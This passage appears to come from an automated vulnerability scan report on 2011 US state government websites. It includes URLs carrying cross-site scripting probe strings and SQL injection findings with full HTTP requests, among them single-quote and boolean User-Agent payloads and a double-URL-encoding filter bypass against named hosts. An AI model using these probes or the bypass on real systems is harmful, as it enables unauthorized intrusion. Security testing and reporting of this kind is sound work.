30.178. http://kodakimagingnetworki.tt.omtrdc.net/m2/kodakimagingnetworki/mbox/standard

30.179. http://landmark-project.com/feed2js/feed2js.php

30.180. http://maps.google.com/maps/api/js

30.181. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

30.182. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

30.183. http://mi.gov/favicon.ico

30.184. http://mi.gov/images/som/governor_309187_7.gif

30.185. http://mibid.bidcorp.com/Auctions/Files/Auction_28057/thumbnail/car1.jpg

30.186. http://mibid.bidcorp.com/Auctions/Files/Auction_28059/thumbnail/img_1345.jpg

30.187. http://mibid.bidcorp.com/Auctions/Files/Auction_28060/thumbnail/img_1353.jpg

30.188. http://mibid.bidcorp.com/Auctions/Files/Auction_28061/thumbnail/img_1354.jpg

30.189. http://mibid.bidcorp.com/Auctions/Files/Auction_28079/thumbnail/m3493a.jpg

30.190. http://mibid.bidcorp.com/Auctions/Files/Auction_28084/thumbnail/dvd1.jpg

30.191. http://mibid.bidcorp.com/Auctions/Files/Auction_28086/thumbnail/img_1031.jpg

30.192. http://mibid.bidcorp.com/Auctions/Files/Auction_28089/thumbnail/img_1034.jpg

30.193. http://mibid.bidcorp.com/Auctions/Files/Auction_28090/thumbnail/cam1.jpg

30.194. http://mibid.bidcorp.com/Auctions/Files/Auction_28092/thumbnail/misc1.jpg

30.195. https://moversguide.usps.com/icoa/flow.do

30.196. http://newbrowse.livehelper.com/servlet/a

30.197. http://nj.gov/nj/images/library/com/com_211_new2.gif

30.198. https://njmvcscheduling.state.nj.us/tc/driverlogin.do

30.199. http://nv.gov/RSSFeed.aspx

30.200. https://onestop.michigan.gov/onestop-main/OneStop/images/buttonEnabled.png

30.201. https://onestop.michigan.gov/onestop-main/OneStop/images/buttonHover.png

30.202. http://oregon.gov/js/oc-resources/marquee.js

30.203. https://pixel.fetchback.com/serve/fb/pdc

30.204. https://seal.verisign.com/getseal

30.205. http://serverapi.arcgisonline.com/jsapi/arcgis/

30.206. http://services.ito.state.il.us/agencycomponents/getBPFeatures.cfm

30.207. http://shots.snap.com/snap_shots.js

30.208. http://thumbnail.api.livestream.com/thumbnail

30.209. http://tn.gov/includes/alert/alert.shtml

30.210. https://treas-secure.treas.state.mi.us/eservice_enu/images/mich_2.gif

30.211. http://twitter.com/statuses/user_timeline/IDAHOgov.json

30.212. http://urls.api.twitter.com/1/urls/count.json

30.213. http://wbtdcs.nara.gov/wtid.js

30.214. https://www.accesskansas.org/favicon.ico

30.215. http://www.alabama.gov/portal/common/subNav.jsp

30.216. http://www.colorado.gov/cs/Satellite

30.217. http://www.coloradochannel.net/sites/all/themes/cochannel/webfontkit/metaplus_bold_caps-webfont.woff

30.218. http://www.coloradochannel.net/sites/all/themes/cochannel/webfontkit/metaplus_medium_caps-webfont.woff

30.219. http://www.delaware.gov/images/favicon.ico

30.220. http://www.delaware.gov/pipe/logos/blog_blog_gis.gif

30.221. http://www.ehawaii.gov/dakine/favicon.ico

30.222. http://www.employment.oregon.gov/js/oc-resources/marquee.js

30.223. http://www.georgiawildlife.com/favicon.ico

30.224. http://www.hoosierdata.in.gov/nav.asp

30.225. http://www.in.gov/dwd/2217.js

30.226. http://www.kansas.gov/favicon.ico

30.227. http://www.legis.state.pa.us/cfdocs/legis/PN/Public/btCheck.cfm

30.228. http://www.michigan.gov/favicon.ico

30.229. http://www.michigan.gov/images/Banner_81725_7.jpg

30.230. http://www.michigan.gov/images/E-file_81726_7.jpg

30.231. http://www.michigan.gov/images/FAQs_81728_7.jpg

30.232. http://www.michigan.gov/images/Forms_81729_7.jpg

30.233. http://www.mo.gov/wp-content/themes/Mo.gov/bavicon.ico

30.234. http://www.mo.gov/wp-content/uploads/2011/04/CW150_logo.gif

30.235. http://www.ms.gov/a

30.236. http://www.ms.gov/favicon.ico

30.237. http://www.ms.gov/how_do_i_fulllist.jsp

30.238. http://www.ms.gov/how_do_i_sub_answer_page.jsp

30.239. http://www.ms.gov/images/hdr_

30.240. http://www.ms.gov/images/hdr_'

30.241. http://www.ms.gov/images/hdr_'%20stYle='x:expre/**/ssion(netsparker(9)).gif

30.242. http://www.ms.gov/images/hdr_46e740

30.243. http://www.ms.gov/images/hdr_featured_sites_

30.244. http://www.ms.gov/images/hdr_featured_sites_'

30.245. http://www.ms.gov/images/hdr_featured_sites_'%20stYle='x:expre/**/ssion(netsparker(9)).gif

30.246. http://www.ms.gov/images/hdr_featured_sites_46e740

30.247. http://www.ms.gov/images/hdr_how_do_i_

30.248. http://www.ms.gov/images/hdr_how_do_i_'

30.249. http://www.ms.gov/images/hdr_how_do_i_'%20stYle='x:expre/**/ssion(netsparker(9)).gif

30.250. http://www.ms.gov/images/hdr_how_do_i_46e740

30.251. http://www.ms.gov/images/hdr_online_services_

30.252. http://www.ms.gov/images/hdr_online_services_'%20stYle='x:expre/**/ssion(netsparker(9)).gif

30.253. http://www.ms.gov/images/hdr_online_services_46e740

30.254. http://www.ms.gov/ms_sub_sub_template.jsp

30.255. http://www.ms.gov/pics/amlogo.gif

30.256. http://www.nh.gov/favicon.ico

30.257. http://www.nist.gov/favicon.ico

30.258. http://www.nist.gov/style/web_fonts/functionpro_medium_macroman/FunctionPro-Medium-webfont.woff

30.259. http://www.ri.gov/favicon.ico

30.260. http://www.ri.gov/img/governmentbox/seal.gif

30.261. http://www.state.mn.us/mn/content_images/images/ExploreMN_Logo_nspallet_copy.jpg

30.262. http://www.state.mn.us/mn/content_images/images/ad_license-minnesota.jpg

30.263. http://www.state.mn.us/mn/content_images/images/governor-dayton_northstar-ad.jpg

30.264. https://www.tennesseeanytime.org/favicon.ico

30.265. https://www.tennesseeanytime.org/includes/alert/alert.shtml

30.266. http://www.tn.gov/css/fonts/aller_it-webfont.woff

30.267. http://www.tn.gov/css/fonts/aller_lt-webfont.woff

30.268. http://www.tn.gov/css/fonts/aller_rg-webfont.woff

30.269. http://www.tn.gov/includes/alert/alert.shtml

30.270. http://www.utah.gov/keywordsearch/applicationcount.html

30.271. http://www.utah.gov/locationaware/ipLookUp.html

30.272. http://www.utah.gov/whatsnew/files/image-4739

30.273. https://www.vermontjoblink.com/ada/global/style/cfmstyle.css

30.274. http://www.visitflorida.com/includes/js/footerSurvey.php

30.275. http://www.vitalchek.com/js/google_analytics_js.aspx

30.276. https://www.vitalchek.com/AjaxFAQServer.aspx

30.277. https://www.vitalchek.com/AjaxOrderStepServer.aspx

30.278. https://www.vitalchek.com/VitalChekStaticContent/images/Portal/VitalChek/background/orderPageRtPanelBlank.gif

30.279. https://www.vitalchek.com/js/google_analytics_js.aspx

30.280. https://www.vitalchek.com/order_step_js.aspx

30.281. http://www.webtools.ca.gov/javascript/shared/weather2/weather3.js.asp

31. Content type is not specified

31.1. http://newchat.livehelper.com/servlet/lhChat

31.2. http://sc.gov/Pages/images/ajax-loader.gif

31.3. http://sc.gov/_catalogs/masterpage/custom_functions.js

31.4. http://server.iad.liveperson.net/hc/33511087/

31.5. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

31.6. http://tomcat2.dot.state.ga.us/favicon.ico

31.7. https://www.accesskansas.org/uccsearch/index.html

31.8. http://www.osc.state.ny.us/redirect_social.php



1. SQL injection
There are 10 instances of this issue:


1.1. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp [hdn_Language parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC020.asp

Issue detail

The hdn_Language parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the hdn_Language parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /PGM/ASP/SC020.asp?hdn_Language=EN'&hdn_ProcessId=1 HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response 1 (redirected)

HTTP/1.1 500 Internal Server Error
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:46:53 GMT; path=/
Date: Sat, 30 Apr 2011 01:14:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 13487
Content-Type: text/html
Expires: Sat, 30 Apr 2011 01:14:26 GMT
Cache-control: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html LANG="EN">
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<meta HTTP-EQUIV="Pragma" CONTENT
...[SNIP]...

Request 2

GET /PGM/ASP/SC020.asp?hdn_Language=EN''&hdn_ProcessId=1 HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response 2 (redirected)

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:46:55 GMT; path=/
Date: Sat, 30 Apr 2011 01:14:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 10617
Content-Type: text/html
Expires: Sat, 30 Apr 2011 01:14:30 GMT
Cache-control: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html LANG="en">
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<meta HTTP-EQUIV="Pragma" CONTE
...[SNIP]...

1.2. http://pa.gov/portal/server.pt/gateway/PTARGS_0_2_24662_2966_368351_43/http [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://pa.gov
Path:   /portal/server.pt/gateway/PTARGS_0_2_24662_2966_368351_43/http

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /portal/server.pt/gateway%2527/PTARGS_0_2_24662_2966_368351_43/http HTTP/1.1
Host: pa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=40mdkvjbk1i3ut55p0o4ui55;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:24:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
PT-HTTPResponse-Type: SESSION_TIMEOUT
PT-Login-URL: http://pa.gov/portal/server.pt?space=Login&cached=false
Pragma: no-cache
Content-Language: en
Set-Cookie: plloginoccured=false; path=/
Set-Cookie: REQUESTURLBEFORESSO=; path=/
Expires: 1304079887496
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1304166287496
Content-Type: text/html; charset=utf-8
Content-Length: 33559

<html>

<head><link type="text/css" href="http://www.portal.state.pa.us/imageserver/plumtree/common/public/css/mainstyle19-en.css" rel="StyleSheet" lang="en"></link><title>Log In</title><script type="
...[SNIP]...
ject, like a hashtable. **/
var gSafeJSVarContainer = new Object();
/** Define a new safe variable, pass the in the name and the value.Returns true if successful, method call will fail if the value is invalid. **/
function addSafeVar(strName, oValue) {
   gSafeJSVarContainer[strName] = oValue;
   return true;
}
/** Retrieve a safe var. Returns false if the variable is undefined or if the value is actually fal
...[SNIP]...

Request 2

GET /portal/server.pt/gateway%2527%2527/PTARGS_0_2_24662_2966_368351_43/http HTTP/1.1
Host: pa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=40mdkvjbk1i3ut55p0o4ui55;

Response 2

HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Apr 2011 12:24:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /portal/SSORedirect.aspx?
Set-Cookie: plloginoccured=false; path=/
Set-Cookie: REQUESTURLBEFORESSO=http://pa.gov:80/portal/server.pt/gateway%27%27/PTARGS_0_2_24662_2966_368351_43/http; path=/
Set-Cookie: ASP.NET_SessionId=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 357

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/portal/SSORedirect.aspx?">here</a>.</h2>
</body></html>
<!--Hostname: ENCTCISP270--><!--Total Request Time: -1
Con
...[SNIP]...

1.3. http://pa.gov/portal/server.pt/gateway/PTARGS_0_2_24825_2966_368351_43/http [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://pa.gov
Path:   /portal/server.pt/gateway/PTARGS_0_2_24825_2966_368351_43/http

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /portal/server.pt/gateway%2527/PTARGS_0_2_24825_2966_368351_43/http HTTP/1.1
Host: pa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=40mdkvjbk1i3ut55p0o4ui55;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:24:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
PT-HTTPResponse-Type: SESSION_TIMEOUT
PT-Login-URL: http://pa.gov/portal/server.pt?space=Login&cached=false
Pragma: no-cache
Content-Language: en
Set-Cookie: plloginoccured=false; path=/
Set-Cookie: REQUESTURLBEFORESSO=; path=/
Expires: 1304079886386
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1304166286386
Content-Type: text/html; charset=utf-8
Content-Length: 33558

<html>

<head><link type="text/css" href="http://www.portal.state.pa.us/imageserver/plumtree/common/public/css/mainstyle19-en.css" rel="StyleSheet" lang="en"></link><title>Log In</title><script type="
...[SNIP]...
ject, like a hashtable. **/
var gSafeJSVarContainer = new Object();
/** Define a new safe variable, pass the in the name and the value.Returns true if successful, method call will fail if the value is invalid. **/
function addSafeVar(strName, oValue) {
   gSafeJSVarContainer[strName] = oValue;
   return true;
}
/** Retrieve a safe var. Returns false if the variable is undefined or if the value is actually fal
...[SNIP]...

Request 2

GET /portal/server.pt/gateway%2527%2527/PTARGS_0_2_24825_2966_368351_43/http HTTP/1.1
Host: pa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=40mdkvjbk1i3ut55p0o4ui55;

Response 2

HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Apr 2011 12:24:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /portal/SSORedirect.aspx?
Set-Cookie: plloginoccured=false; path=/
Set-Cookie: REQUESTURLBEFORESSO=http://pa.gov:80/portal/server.pt/gateway%27%27/PTARGS_0_2_24825_2966_368351_43/http; path=/
Set-Cookie: ASP.NET_SessionId=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 357

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/portal/SSORedirect.aspx?">here</a>.</h2>
</body></html>
<!--Hostname: ENCTCISP270--><!--Total Request Time: -1
Con
...[SNIP]...

1.4. http://pa.gov/portal/server.pt/gateway/PTARGS_0_2_24879_2966_368351_43/http [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://pa.gov
Path:   /portal/server.pt/gateway/PTARGS_0_2_24879_2966_368351_43/http

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /portal/server.pt/gateway'/PTARGS_0_2_24879_2966_368351_43/http HTTP/1.1
Host: pa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=40mdkvjbk1i3ut55p0o4ui55;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:24:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
PT-HTTPResponse-Type: SESSION_TIMEOUT
PT-Login-URL: http://pa.gov/portal/server.pt?space=Login&cached=false
Pragma: no-cache
Content-Language: en
Set-Cookie: plloginoccured=false; path=/
Set-Cookie: REQUESTURLBEFORESSO=; path=/
Expires: 1304079883339
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1304166283339
Content-Type: text/html; charset=utf-8
Content-Length: 33559

<html>

<head><link type="text/css" href="http://www.portal.state.pa.us/imageserver/plumtree/common/public/css/mainstyle19-en.css" rel="StyleSheet" lang="en"></link><title>Log In</title><script type="
...[SNIP]...
ject, like a hashtable. **/
var gSafeJSVarContainer = new Object();
/** Define a new safe variable, pass the in the name and the value.Returns true if successful, method call will fail if the value is invalid. **/
function addSafeVar(strName, oValue) {
   gSafeJSVarContainer[strName] = oValue;
   return true;
}
/** Retrieve a safe var. Returns false if the variable is undefined or if the value is actually fal
...[SNIP]...

Request 2

GET /portal/server.pt/gateway''/PTARGS_0_2_24879_2966_368351_43/http HTTP/1.1
Host: pa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=40mdkvjbk1i3ut55p0o4ui55;

Response 2

HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Apr 2011 12:24:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /portal/SSORedirect.aspx?
Set-Cookie: plloginoccured=false; path=/
Set-Cookie: REQUESTURLBEFORESSO=http://pa.gov:80/portal/server.pt/gateway''/PTARGS_0_2_24879_2966_368351_43/http; path=/
Set-Cookie: ASP.NET_SessionId=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 358

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/portal/SSORedirect.aspx?">here</a>.</h2>
</body></html>
<!--Hostname: ENCTCISP270--><!--Total Request Time: -1
Con
...[SNIP]...

1.5. http://www.alabama.gov/portal/index.jsp [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.alabama.gov
Path:   /portal/index.jsp

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /portal/index.jsp HTTP/1.1
Host: www.alabama.gov
Proxy-Connection: keep-alive
Referer: http://al.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16'%20and%201%3d1--%20
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:15:53 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Cache-Control: private
Set-Cookie: JSESSIONID=abczMjORTQ-kQ6HiE_J_s; path=/
Content-Type: text/html
Content-Length: 34766


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<a href='http://www.alabama.gov/sliverheader/Welcome.do?url=http://media.alabama.gov/AgencyTemplates/ado/template_redirect.aspx?ID=4998&amp;t=3' target="_blank">Hiring Starts to Pick Up Pace </a>

<br />


        <a href='http://www.alabama.gov/sliverheader/Welcome.do?url=http://governor.alabama.gov/news/news_detail.aspx?ID=4999&amp;t=1' target="_blank">Governor Bentley Announces Approval of Federal Disaster...</a>

<br />


</div>
                   </td>
<td>&nbsp;</td>
                   <td>
                       <div class="footer_links">

<img src="/images/trans_spanish.gif" alt="alabama.gov en Espanol" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|es&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">Spanish</a><br />
<img src="/images/trans_german.gif" alt="alabama.gov auf Deutsch" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|de&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">German</a><br />
<img src="/images/trans_korean.gif" alt="Korean alabama.gov" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|ko&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">Korean</a><br />
<img src="/images/trans_japanese.gif" alt="Japanese alabama.gov" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|ja&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">Japanese</a>

                       </div>
                   </td>
                   <td>
   <div class="footer_links">
                           


...[SNIP]...

Request 2

GET /portal/index.jsp HTTP/1.1
Host: www.alabama.gov
Proxy-Connection: keep-alive
Referer: http://al.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16'%20and%201%3d2--%20
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:15:50 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Cache-Control: private
Set-Cookie: JSESSIONID=abc3n9TTHLjN--MCD_J_s; path=/
Content-Type: text/html
Content-Length: 34756


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<a href='http://www.alabama.gov/sliverheader/Welcome.do?url=http://governor.alabama.gov/news/news_detail.aspx?ID=5002&amp;t=1' target="_blank">Insurers Open Several Mobile Claims Offices</a>

<br />


        <a href='http://www.alabama.gov/sliverheader/Welcome.do?url=http://governor.alabama.gov/news/news_detail.aspx?ID=5000&amp;t=1' target="_blank">Governor Bentley Opens Recovery Response Call Center </a>

<br />


</div>
                   </td>
<td>&nbsp;</td>
                   <td>
                       <div class="footer_links">

<img src="/images/trans_spanish.gif" alt="alabama.gov en Espanol" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|es&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">Spanish</a><br />
<img src="/images/trans_german.gif" alt="alabama.gov auf Deutsch" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|de&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">German</a><br />
<img src="/images/trans_korean.gif" alt="Korean alabama.gov" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|ko&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">Korean</a><br />
<img src="/images/trans_japanese.gif" alt="Japanese alabama.gov" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|ja&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">Japanese</a>

                       </div>
                   </td>
                   <td>
   <div class="footer_links">
                           







...[SNIP]...

1.6. http://www.budget.state.pa.us/portal/server.pt/gateway/PTARGS_0_2_38668_4566_458236_43/http [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.budget.state.pa.us
Path:   /portal/server.pt/gateway/PTARGS_0_2_38668_4566_458236_43/http

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /portal/server.pt/gateway'/PTARGS_0_2_38668_4566_458236_43/http HTTP/1.1
Host: www.budget.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=uik0x145tlcpdsedjzdxtmqz;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:29:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
PT-HTTPResponse-Type: SESSION_TIMEOUT
PT-Login-URL: http://www.budget.state.pa.us/portal/server.pt?space=Login&cached=false
Pragma: no-cache
Content-Language: en
Set-Cookie: plloginoccured=false; path=/
Set-Cookie: REQUESTURLBEFORESSO=; path=/
Expires: 1304080198730
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1304166598730
Content-Type: text/html; charset=utf-8
Content-Length: 26799

<html>

<head><link type="text/css" href="http://www.portal.state.pa.us/imageserver/plumtree/common/public/css/mainstyle19-en.css" rel="StyleSheet" lang="en"></link><title>Log In</title><script type="
...[SNIP]...
ject, like a hashtable. **/
var gSafeJSVarContainer = new Object();
/** Define a new safe variable, pass the in the name and the value.Returns true if successful, method call will fail if the value is invalid. **/
function addSafeVar(strName, oValue) {
   gSafeJSVarContainer[strName] = oValue;
   return true;
}
/** Retrieve a safe var. Returns false if the variable is undefined or if the value is actually fal
...[SNIP]...

Request 2

GET /portal/server.pt/gateway''/PTARGS_0_2_38668_4566_458236_43/http HTTP/1.1
Host: www.budget.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=uik0x145tlcpdsedjzdxtmqz;

Response 2

HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Apr 2011 12:29:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /portal/SSORedirect.aspx?
